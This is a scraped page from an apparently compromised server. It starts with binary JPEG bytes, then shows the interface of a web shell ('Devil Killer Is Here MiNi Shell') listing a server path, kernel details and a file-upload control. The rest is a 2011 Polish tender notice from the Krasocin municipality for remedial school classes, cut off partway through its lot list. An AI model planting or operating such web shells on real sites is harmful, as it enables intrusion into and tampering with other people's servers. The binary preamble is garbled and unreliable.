JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110119/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110119/9096-N-2011.html

<p class="kh_header"><b>Krasocin: Usługi edukacyjne obejmującde prowadzenie zajęć w ramach projektu Indywidualizacja procesu nauczania i wychowania uczniów klas I-III  szkoły podstawowej w roku szkolnym 2010/2011 w szkołach, dla których organem prowadzącym jest gmina Krasocin.</b><br>
<b>Numer ogłoszenia: 9096 - 2011; data zamieszczenia: 19.01.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Krasocin , ul. Macierzy Szkolnej 1, 29-105 Krasocin, woj. świętokrzyskie, tel. 041 3917026 w. 122, faks 041 3917010.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.krasocin.eobip.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> www.krasocin.eobip.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługi edukacyjne obejmującde prowadzenie zajęć w ramach projektu Indywidualizacja procesu nauczania i wychowania uczniów klas I-III  szkoły podstawowej w roku szkolnym 2010/2011 w szkołach, dla których organem prowadzącym jest gmina Krasocin..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Usługi będą realizowane w następujących szkołach i specjalnościach. Jednostka 1 h w SIWZ używana jest w rozumieniu 1 godziny lekcyjnej, czyli 45 minut.
3.1. Zadanie nr I- Szkoła Podstawowa w Bukowie
1. Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu w tym także  z zagrożonych ryzykiem dysleksji w roku szkolnym 2010/2011, 90h dla 20 uczniów w 3 grupach,
a) grupa I- 30h- 8 uczniów
b) grupa II- 30h- 6 uczniów
c) grupa III- 30h- 6 uczniów
2. Zajęcia dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych w roku szkolnym 2010/2011, 60h dla 14 uczniów w 2 grupach,
a) grupa I-30h- 8 uczniów
b) grupa II- 30h- 6 uczniów
3. Zajęcia logopedyczne dla dzieci z zaburzeniami rozwoju mowy w roku szkolnym 2010/2011, 30h dla 1 ucznia
a) grupa I- 30h- 1 uczeń
4. Zajęcia rozwijające zainteresowania uczniów szczególnie uzdolnionych, ze szczególnym uwzględnieniem nauk matematyczno-przyrodniczych w roku szkolnym 2010/2011, 30h dla 8 uczniów
a) grupa I- 30h- 8 uczniów
3.2 Zadanie nr II - Szkoła Podstawowa w Krasocinie
1. Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu w tym także z zagrożonych ryzykiem dysleksji w roku szkolnym 2010/2011, 120h dla 32 uczniów w 4 grupach
a) grupa I- 30h- 8 uczniów
b) grupa II- 30h-8 uczniów
c) grupa III- 30h-8 uczniów
d) grupa IV- 30h-8 uczniów
2. . Zajęcia dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych w roku szkolnym 2010/2011, 90h dla 24 uczniów w 3 grupach
a) grupa I- 30h-8 uczniów
b) grupa II- 30h-8 uczniów
c) grupa III- 30h-8 uczniów
3. Zajęcia rozwijające dla dzieci szczególnie uzdolnionych z muzyki w roku szkolnym 2010/2011, 30h dla 15 uczniów
a) grupa I- 30h-15 uczniów
4. Zajęcia rozwijające dla dzieci szczególnie uzdolnionych z plastyki w roku szkolnym 2010/2011, 30h dla 10 uczniów
a) grupa I- 30h- 10 uczniów
5. Zajęcia rozwijające dla dzieci szczególnie uzdolnionych z języka angielskiego w roku szkolnym 2010/2011, 30h dla 7 uczniów
a) grupa I- 30h- 7 uczniów
3.3 Zadanie nr III - Szkoła Podstawowa w Olesznie 
1. Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu w tym także z zagrożonych ryzykiem dysleksji w roku szkolnym 2010/2011, 90h dla 24 uczniów w 3 grupach
a) grupa I- 30h-8 uczniów
b) grupa II- 30h-8 uczniów
c) grupa III- 30h-8 uczniów
2. Zajęcia dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych w roku szkolnym 2010/2011, 60h dla 16 uczniów w 2 grupach
a) grupa I- 30h-8 uczniów
b) grupa II- 30h-8 uczniów
3. Zajęcia socjometryczne w roku szkolnym 2010/2011, 30h dla 10 uczniów
a) grupa I- 30h- 10 uczniów
4. Zajęcia rozwijające zainteresowania uczniów szczególnie uzdolnionych, ze szczególnym uwzględnieniem nauk matematyczno-przyrodniczych w roku szkolnym 2010/2011, 30h dla 10 uczniów
a) grupa I- 30h-10 uczniów
3.4. Zadanie nr IV- Szkoła Podstawowa w Mieczynie
1. Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu w tym także   z zagrożonych ryzykiem dysleksji w roku szkolnym 2010/2011,30h dla 6 uczniów 
a) grupa I- 30h-6 uczniów
2. Zajęcia dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych w roku szkolnym 2010/2011, 90h dla 25 uczniów w 3 grupach
a) grupa I- 30h-8 uczniów
b) grupa II- 30h-8 uczniów
c) grupa III- 30h-9 uczniów
3. Zajęcia rozwijające zainteresowania uczniów szczególnie uzdolnionych, ze szczególnym uwzględnieniem nauk matematyczno-przyrodniczych w roku szkolnym 2010/2011, 30h dla 8 uczniów
a) grupa I- 30h-8 uczniów
3.5. Zadanie nr V - Szkoła Podstawowa w Czostkowie
1. Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu w tym także   z zagrożonych ryzykiem dysleksji w roku szkolnym 2010/2011,60h dla 14 uczniów  w 2 grupach
a) grupa I- 30h-6 uczniów
b) grupa II- 30h-8 uczniów
2. Zajęcia dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych w roku szkolnym 2010/2011, 60h dla 13 uczniów w 2 grupach
a) grupa I- 30h-7 uczniów
b) grupa II- 30h-6 uczniów
3. Zajęcia rozwijające zainteresowania uczniów szczególnie uzdolnionych, ze szczególnym uwzględnieniem nauk matematyczno-przyrodniczych w roku szkolnym 2010/2011, 30h dla 7 uczniów
a) grupa I- 30h-7 uczniów
4. Gimnastyk korekcyjna w roku szkolnym 2010/2011, 30h dla 7 uczniów
a) grupa I- 30h-7 uczniów
3.6. Zadanie nr VI- Szkoła Podstawowa w Cieślach
1. Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu w tym także   z zagrożonych ryzykiem dysleksji w roku szkolnym 2010/2011,30h dla 6 uczniów 
a) grupa I- 30h-6 uczniów
2. Zajęcia dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych w roku szkolnym 2010/2011, 30h dla 6 uczniów 
b) grupa I- 30h-6 uczniów
3. Zajęcia rozwijające zainteresowania uczniów szczególnie uzdolnionych, ze szczególnym uwzględnieniem nauk matematyczno-przyrodniczych w roku szkolnym 2010/2011, 60h dla 10 uczniów w 2 grupach
a) grupa I- 30h-5 uczniów
b) grupa II- 30h-5 uczniów
Szczegółowe obowiązki prowadzących zajęcia w ramach programu Indywidualizacja procesu nauczania i wychowania uczniów klas I-III szkoły podstawowej w roku szkolnym 2010/2011 szkołach , dla których organem prowadzącym jest Gmina Krasocin, które są przedmiotem niniejszego zamówienia, zawarte są w załączniku nr 3 do SIWZ..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający dopuszcza możliwości zamówienia uzupełniającego, zgodnie z art. 67 ust. 1 pkt 6 ustawy PZP, w przypadku zmian zasad projektu Indywidualizacja procesu nauczania  i wychowania uczniów klas I-III szkoły podstawowej wprowadzonych przez Instytucję Zarządzającą Programem Operacyjnym  Kapitał Ludzki.
Zamawiający nie wymaga aby oferta obejmowała całość przedmiotu zamówienia.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 39.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia spełniania tego niniejszego warunku Wykonawcy zobowiązani są przedłożyć oświadczenia o spełnianiu warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy poszczególnych zadań muszą spełniać następujące wymogi:
 1. każdy wykonawca usługi powinien posiadać stopień awansu zawodowego minimum nauczyciela kontraktowego.
 2. wykonawcy poszczególnych zadań muszą spełniać następujące wymogi dotyczące wykształcenia:
Zadanie I.1, I.2., I.4.- wykształcenie wyższe magisterskie z przygotowaniem pedagogicznym dającym kwalifikacje do nauczania w klasach I-III szkoły podstawowej.
Zadanie I.3- wykształcenie wyższe magisterskie z przygotowaniem pedagogicznym oraz studia podyplomowe w zakresie logopedii.

Zadanie II.1, II.2.- wykształcenie wyższe magisterskie z przygotowaniem pedagogicznym dającym kwalifikacje do nauczania w klasach I-III szkoły podstawowej.
Zadanie II.3.- wykształcenie wyższe magisterskie z przygotowaniem pedagogicznym lub studium pedagogiczne z muzyki
Zadanie II.4.-  wykształcenie wyższe magisterskie z przygotowaniem pedagogicznym specjalność- plastyka lub studia podyplomowe z plastyki, sztuki
Zadanie II.5.- wykształcenie wyższe z przygotowaniem pedagogicznym, specjalność filologia angielska

Zadanie III.1., III.2, III.4.- wykształcenie wyższe magisterskie z przygotowaniem pedagogicznym dającym kwalifikacje do nauczania w klasach I-III szkoły podstawowej.
Zadanie III.3. - wyższe wykształcenie magisterskie z przygotowaniem pedagogicznym, specjalność- pedagogika specjalna, lub studia podyplomowe komunikacja społeczna, pedagogika specjalna.

Zadanie IV.1., IV.2., IV.3. - wykształcenie wyższe magisterskie z przygotowaniem pedagogicznym dającym kwalifikacje do nauczania w klasach I-III szkoły podstawowej.

Zadanie V.1., V.2, V.3.- wykształcenie wyższe magisterskie z przygotowaniem pedagogicznym dającym kwalifikacje do nauczania w klasach I-III szkoły podstawowej.
Zadanie V.4.- wykształcenie wyższe magisterskie z przygotowaniem pedagogicznym, kurs kwalifikacyjny z gimnastyki korekcyjnej

Zadanie VI.1., VI.2, VI.3.- wykształcenie wyższe magisterskie z przygotowaniem pedagogicznym dającym kwalifikacje do nauczania w klasach I-III szkoły podstawowej.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia spełnienia niniejszego warunku Wykonawcy zobowiązani są przedłożyć oświadczenie o spełnieniu warunków udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca w celu potwierdzenia dysponowania osobami zdolnymi do wykonania danego zadania w zamówieniu musi wykazać, że dysponuje zespołem zdolnym do realizacji zamówienia, a w szczególności co najmniej jedną osobę posiadającą klasyfikacje wymienione w pkt IV.1. podpunkt 2). Wykaz osób, które będą uczestniczyć w wykonaniu zamówienia wraz z informacjami na temat ich wykształcenia, niezbędnych do wykonania zamówienia wypełniony wg załącznika nr 6 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia spełnienia niniejszego warunku Wykonawcy zobowiązani są przedłożyć oświadczenie o spełnieniu warunków udziału w postępowaniu</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.krasocin.eobip.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zespół Obsługi Placówek Oświatowych w Krasocinie ul. Macierzy Szkolnej 1 , 29-105 Krasocin , pokój nr 12.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.01.2011 godzina 12:00, miejsce: Urząd Gminy w Krasocinie, ul. Macierzy Szkolnej 1, 29-105 Krasocin, sekretariat pokój nr 8.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu w tym także   z zagrożonych ryzykiem dysleksji w roku szkolnym 2010/2011- SP Bukowa.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu w tym także   z zagrożonych ryzykiem dysleksji w roku szkolnym 2010/2011: 
a) grupa I- 30h- 8 uczniów.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu w tym także  z zagrożonych ryzykiem dysleksji w roku szkolnym 2010/2011- SP Bukowa.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu w tym także  z zagrożonych ryzykiem dysleksji w roku szkolnym 2010/2011, 
b) grupa II- 30h- 6 uczniów.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu w tym także z zagrożonych ryzykiem dysleksji w roku szkolnym 2010/2011-SP Bukowa.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu w tym także z zagrożonych ryzykiem dysleksji w roku szkolnym 2010/2011, 
c) grupa III- 30h- 6 uczniów.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zajęcia dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych w roku szkolnym 2010/2011- SP Bukowa.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zajęcia dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych w roku szkolnym 2010/2011, 
a) grupa I-30h- 8 uczniów.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Zajęcia dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych w roku szkolnym 2010/2011-SP Bukowa.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zajęcia dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych w roku szkolnym 2010/2011
b) grupa II- 30h- 6 uczniów.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Zajęcia logopedyczne dla dzieci z zaburzeniami rozwoju mowy w roku szkolnym 2010/2011-SP Bukowa.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zajęcia logopedyczne dla dzieci z zaburzeniami rozwoju mowy w roku szkolnym 2010/2011, 
a) grupa I- 30h- 1 uczeń.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Zajęcia rozwijające zainteresowania uczniów szczególnie uzdolnionych, ze szczególnym uwzględnieniem nauk matematyczno-przyrodniczych w roku szkolnym 2010/2011-SP Bukowa.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zajęcia rozwijające zainteresowania uczniów szczególnie uzdolnionych, ze szczególnym uwzględnieniem nauk matematyczno-przyrodniczych w roku szkolnym 2010/2011, 
a) grupa I- 30h- 8 uczniów.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu w tym także z zagrożonych ryzykiem dysleksji w roku szkolnym 2010/2011-SP Krasocin.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu w tym także z zagrożonych ryzykiem dysleksji w roku szkolnym 2010/2011, 
a) grupa I- 30h- 8 uczniów.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu w tym także z zagrożonych ryzykiem dysleksji w roku szkolnym 2010/2011- SP Krasocin.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu w tym także z zagrożonych ryzykiem dysleksji w roku szkolnym 2010/2011, 
b) grupa II- 30h-8 uczniów.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5.</p></li>
